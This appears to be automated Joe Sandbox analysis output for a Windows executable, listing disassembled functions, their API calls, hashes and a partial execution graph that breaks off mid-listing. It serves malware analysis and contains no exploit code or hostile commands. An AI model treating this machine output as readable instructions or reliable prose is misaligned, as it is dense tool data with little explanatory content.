                      • Part of subcall function 00402E49: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402E71
                      • Part of subcall function 00402E49: __fprintf_l.LIBCMT ref: 00402ECB
                      • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                      • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                      • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                      • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                      • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                      • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                      • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                      • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                      • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                      • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                      • Part of subcall function 00403E37: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A0D,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403E67
                    • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 00403178
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                    • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,02208F10,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 004031DD
                      • Part of subcall function 00402C55: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402CF0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                    • String ID: $pA
                    • API String ID: 790731606-4007739358
                    • Opcode ID: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
                    • Instruction ID: e60bee266b2990c05e42038f4eaf1cd2a2725b994cf9f5ea8c77fc408b4d2e90
                    • Opcode Fuzzy Hash: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
                    • Instruction Fuzzy Hash: 6851E6B9601204BEE500BBB39D82D7F266DDBC471CB108C3FB440A50D3E93CAE65662E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040249D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                    Download Yara Rule
                    APIs
                    • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040254F
                    • PathRemoveArgsW.SHLWAPI(?), ref: 00402585
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 004099A5: SetEnvironmentVariableW.KERNEL32(02209F70,02209F70,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                      • Part of subcall function 0040E5F0: RtlFreeHeap.NTDLL(02200000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                    • String ID: *pA
                    • API String ID: 1199808876-3833533140
                    • Opcode ID: dffdd5ba53270b8295326c032e0582dd1a13c4ab5ce676133e23ebaef934a0d5
                    • Instruction ID: beb9823a99ae011e4ed5f1d055ef6d1d692690281f772a57edd19b399da9bd76
                    • Opcode Fuzzy Hash: dffdd5ba53270b8295326c032e0582dd1a13c4ab5ce676133e23ebaef934a0d5
                    • Instruction Fuzzy Hash: E541E9B5504301BED600BBB39D8293F76A8EBC471CF508C3FB444A61D2EA3CD9655A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040973A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040D968: TlsGetValue.KERNEL32(?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D96F
                      • Part of subcall function 0040D968: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D98A
                      • Part of subcall function 0040D968: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D999
                    • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$AllocCommandHeapLine
                    • String ID: $"
                    • API String ID: 1339485270-3817095088
                    • Opcode ID: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                    • Instruction ID: 229198f1d41a65a6e9ffff917a794aecd7294c87f6384db1244c7b0cd665179e
                    • Opcode Fuzzy Hash: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                    • Instruction Fuzzy Hash: 3131A6735252218ADB64AF10981127772A1EFA2B60F18C17FE4926B3C2F37D4D41D369
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A638 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: _wcsicmpwcscmp
                    • String ID: $0A
                    • API String ID: 3419221977-513306843
                    • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                    • Instruction ID: a9c09230f7291aa91694be4cadd9aa4df44d847ede942287367b49c05577748a
                    • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                    • Instruction Fuzzy Hash: 39118F76508B018BD3209F56D440913B3F9EF94364329893FD88963790DB76EC658BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405722
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405746
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide
                    • String ID: $0A
                    • API String ID: 626452242-513306843
                    • Opcode ID: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
                    • Instruction ID: 6633c5b8762e659e7e7445bcc2ebba2587ddb8769fcb30c67f307584ac15d0df
                    • Opcode Fuzzy Hash: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
                    • Instruction Fuzzy Hash: D4F0653A38632137E230215A6C06F57295DC785F71F3542367B247F3D0C5B1680046BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DBFF Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?), ref: 0040DC13
                    • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?), ref: 0040DCC8
                    • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000), ref: 0040DCEB
                    • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?), ref: 0040DD43
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 830345296-0
                    • Opcode ID: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                    • Instruction ID: 326a62a2d88e17b700e0b5dbbe6d23d3e5727d380a42910b8190cd6cec96877c
                    • Opcode Fuzzy Hash: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                    • Instruction Fuzzy Hash: D151E570A04B069FD324CF69D980962B7F4FF587103148A3EE49A97A50D338F959CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E7D0 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0040E7E5
                    • HeapAlloc.KERNEL32(02200000,00000000,0000000A), ref: 0040E809
                    • HeapReAlloc.KERNEL32(02200000,00000000,00000000,0000000A), ref: 0040E82D
                    • HeapFree.KERNEL32(02200000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E864
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Alloc$Freewcslen
                    • String ID:
                    • API String ID: 2479713791-0
                    • Opcode ID: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
                    • Instruction ID: 61d70e0538fde6a9b2f408d2d23f17b2afdd03d3414029a6c312abdd158bf447
                    • Opcode Fuzzy Hash: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
                    • Instruction Fuzzy Hash: 6C2115B5604209EFCB04DF95D884FAAB7B9EB49354F10C169F8099B390D735EA81CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DB18 Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
                    • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040DB63
                    • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E
                      • Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 830345296-0
                    • Opcode ID: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                    • Instruction ID: 234cd8b738bfcb23ec7c58dff1098e76d365aadfe99366d65fb7203dd4a6e8aa
                    • Opcode Fuzzy Hash: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                    • Instruction Fuzzy Hash: 6A113D72504710AFC3208F68DC40D56BBFAEB48721B15892EE596E36A0CB34F844CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DD5D Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DD6F
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DD86
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DDA2
                    • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DDBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalFreeHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 1298188129-0
                    • Opcode ID: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                    • Instruction ID: 339acd6113cd15283fdaf2d24efa5c6700350868ea18a16039eb98c455fe0077
                    • Opcode Fuzzy Hash: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                    • Instruction Fuzzy Hash: 7C012C71A0161ABFC7108F96ED049A7FB78FF49751345817AA804A7664D734E824CFE8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A54F Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A79A: memset.MSVCRT ref: 0040A802
                      • Part of subcall function 0040DFC6: EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
                      • Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
                      • Part of subcall function 0040DFC6: LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
                    • HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
                    • HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
                    • HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FreeHeap$CriticalSection$EnterLeavememset
                    • String ID:
                    • API String ID: 4254243056-0
                    • Opcode ID: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                    • Instruction ID: 62ba4ec21453903b754b53d00370c9fddb20f7a3713721c865cfde946388869e
                    • Opcode Fuzzy Hash: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                    • Instruction Fuzzy Hash: B5F04471105209BFC6125B16DD40C57BF7DFF49798342412AB40463570CB36ED75DBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:9.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:80
                    execution_graph 10541 401f4c 10542 40e660 21 API calls 10541->10542 10543 401f54 10542->10543 10564 40e520 GetLastError TlsGetValue SetLastError 10543->10564 10545 401f5a 10565 40e520 GetLastError TlsGetValue SetLastError 10545->10565 10547 401f6b 10548 40e6c0 4 API calls 10547->10548 10549 401f73 10548->10549 10566 40e520 GetLastError TlsGetValue SetLastError 10549->10566 10551 401f79 10567 40e520 GetLastError TlsGetValue SetLastError 10551->10567 10553 401f81 10568 40a190 10553->10568 10557 401f8e 10572 405182 TlsGetValue 10557->10572 10559 401f99 10560 408e27 20 API calls 10559->10560 10561 401fa2 10560->10561 10562 4051a0 3 API calls 10561->10562 10563 401fa7 10562->10563 10563->10563 10564->10545 10565->10547 10566->10551 10567->10553 10573 40a120 10568->10573 10571 40e720 TlsGetValue 10571->10557 10572->10559 10574 40a130 10573->10574 10574->10574 10575 40e900 3 API calls 10574->10575 10576 401f88 10575->10576 10576->10571 7485 401000 memset GetModuleHandleW HeapCreate 7486 401044 7485->7486 7538 40e4d0 HeapCreate TlsAlloc 7486->7538 7488 401053 7541 40b120 7488->7541 7490 40105d 7544 40a1c0 HeapCreate 7490->7544 7492 40106c 7545 409669 7492->7545 7494 401071 7550 408dee memset InitCommonControlsEx CoInitialize 7494->7550 7496 401076 7551 4053b5 InitializeCriticalSection 7496->7551 7498 40107b 7552 405068 7498->7552 7502 4010c3 7555 40aa5a 7502->7555 7506 4010e9 7507 40aa5a 16 API calls 7506->7507 7508 4010f4 7507->7508 7509 40a9c8 13 API calls 7508->7509 7510 40110f 7509->7510 7566 40e266 7510->7566 7512 40112d 7513 405068 4 API calls 7512->7513 7514 40113d 7513->7514 7515 40aa5a 16 API calls 7514->7515 7516 401148 7515->7516 7517 40a9c8 13 API calls 7516->7517 7518 401163 SetConsoleCtrlHandler 7517->7518 7572 409fb0 7518->7572 7520 401180 7578 40e520 GetLastError TlsGetValue SetLastError 7520->7578 7522 401186 7579 402eed 7522->7579 7526 401197 7604 401ba0 7526->7604 7529 4011a7 7900 402fad 7529->7900 7530 4011ac 7711 403f53 7530->7711 8031 40ed40 HeapAlloc HeapAlloc TlsSetValue 7538->8031 7540 40e4f7 7540->7488 8032 40dbac HeapAlloc HeapAlloc InitializeCriticalSection 7541->8032 7543 40b12e 7543->7490 7544->7492 8033 40d9d3 7545->8033 7549 409687 InitializeCriticalSection 7549->7494 7550->7496 7551->7498 8045 40e7d0 7552->8045 7554 401095 GetStdHandle 7885 40a460 7554->7885 7556 40aa63 7555->7556 7557 4010ce 7555->7557 8052 40ab16 7556->8052 7895 40a9c8 HeapAlloc 7557->7895 7561 40aaa0 7563 40aab3 HeapFree 7561->7563 7564 40aaa7 HeapFree 7561->7564 7563->7557 7564->7563 7565 40aa8e HeapFree 7565->7561 7565->7565 8096 40e3b9 7566->8096 7569 40e283 RtlAllocateHeap 7570 40e2a2 memset 7569->7570 7571 40e2e6 7569->7571 7570->7571 7571->7512 7573 40a0d0 7572->7573 7574 40a0d8 7573->7574 7575 40a0fa SetUnhandledExceptionFilter 7573->7575 7576 40a0e1 SetUnhandledExceptionFilter 7574->7576 7577 40a0eb SetUnhandledExceptionFilter 7574->7577 7575->7520 7576->7577 7577->7520 7578->7522 8102 40e660 7579->8102 7583 402f02 8117 40e520 GetLastError TlsGetValue SetLastError 7583->8117 7585 402f57 8118 40e520 GetLastError TlsGetValue SetLastError 7585->8118 7587 402f5f 8119 40e520 GetLastError TlsGetValue SetLastError 7587->8119 7589 402f67 8120 40e520 GetLastError TlsGetValue SetLastError 7589->8120 7591 402f6f 8121 40d7a0 7591->8121 7595 402f8a 8126 405eb0 7595->8126 7597 402f92 8136 405170 TlsGetValue 7597->8136 7599 40118d 7600 40e560 TlsGetValue 7599->7600 7601 40e5a6 RtlReAllocateHeap 7600->7601 7602 40e589 RtlAllocateHeap 7600->7602 7603 40e5c7 7601->7603 7602->7603 7603->7526 7605 40e660 21 API calls 7604->7605 7606 401baf 7605->7606 8161 40e520 GetLastError TlsGetValue SetLastError 7606->8161 7608 401bb5 8162 40e520 GetLastError TlsGetValue SetLastError 7608->8162 7610 401bc7 8163 40e520 GetLastError TlsGetValue SetLastError 7610->8163 7612 401bcf 8164 409698 7612->8164 7616 401bdb LoadLibraryExW 7617 4051a0 3 API calls 7616->7617 7618 401be8 EnumResourceTypesW FreeLibrary 7617->7618 7636 401c13 7618->7636 7619 401cb1 7620 40ab16 4 API calls 7619->7620 7621 401cbc 7620->7621 8172 40e520 GetLastError TlsGetValue SetLastError 7621->8172 7623 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7623->7636 7624 401cc2 8173 40e520 GetLastError TlsGetValue SetLastError 7624->8173 7626 401cca 8174 40e520 GetLastError TlsGetValue SetLastError 7626->8174 7628 401cd2 8175 40e520 GetLastError TlsGetValue SetLastError 7628->8175 7630 40e520 GetLastError TlsGetValue SetLastError 7630->7636 7631 401cda 8176 40e520 GetLastError TlsGetValue SetLastError 7631->8176 7633 401ce7 8177 40e520 GetLastError TlsGetValue SetLastError 7633->8177 7635 401cef 8178 405e10 7635->8178 7636->7619 7636->7623 7636->7630 7638 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7636->7638 7680 401e27 7636->7680 7638->7636 7641 401cff 8187 40d780 7641->8187 7645 401d0c 7646 405eb0 6 API calls 7645->7646 7647 401d14 7646->7647 7648 40e560 3 API calls 7647->7648 7649 401d1e 7648->7649 8191 40e520 GetLastError TlsGetValue SetLastError 7649->8191 7651 401d28 8192 40e6c0 7651->8192 7653 401d30 7654 40e560 3 API calls 7653->7654 7655 401d3a 7654->7655 8197 40e520 GetLastError TlsGetValue SetLastError 7655->8197 7657 401d40 8198 40e520 GetLastError TlsGetValue SetLastError 7657->8198 7659 401d48 8199 40e520 GetLastError TlsGetValue SetLastError 7659->8199 7661 401d50 8200 40e520 GetLastError TlsGetValue SetLastError 7661->8200 7663 401d58 7664 40d780 8 API calls 7663->7664 7665 401d68 7664->7665 8201 405182 TlsGetValue 7665->8201 7667 401d6d 7668 405eb0 6 API calls 7667->7668 7669 401d75 7668->7669 7670 40e560 3 API calls 7669->7670 7671 401d7f 7670->7671 8202 40e520 GetLastError TlsGetValue SetLastError 7671->8202 7673 401d85 8203 40e520 GetLastError TlsGetValue SetLastError 7673->8203 7675 401d8d 8204 405f20 7675->8204 7677 401d9d 7678 40e560 3 API calls 7677->7678 7679 401da7 7678->7679 7679->7680 8212 40985e 7679->8212 7683 401e23 7685 40e5f0 RtlFreeHeap 7683->7685 7688 401e3c 7685->7688 7686 401dc6 8218 40e520 GetLastError TlsGetValue SetLastError 7686->8218 7690 40e5f0 RtlFreeHeap 7688->7690 7689 401dce 8219 409872 7689->8219 7692 401e45 7690->7692 7694 40e5f0 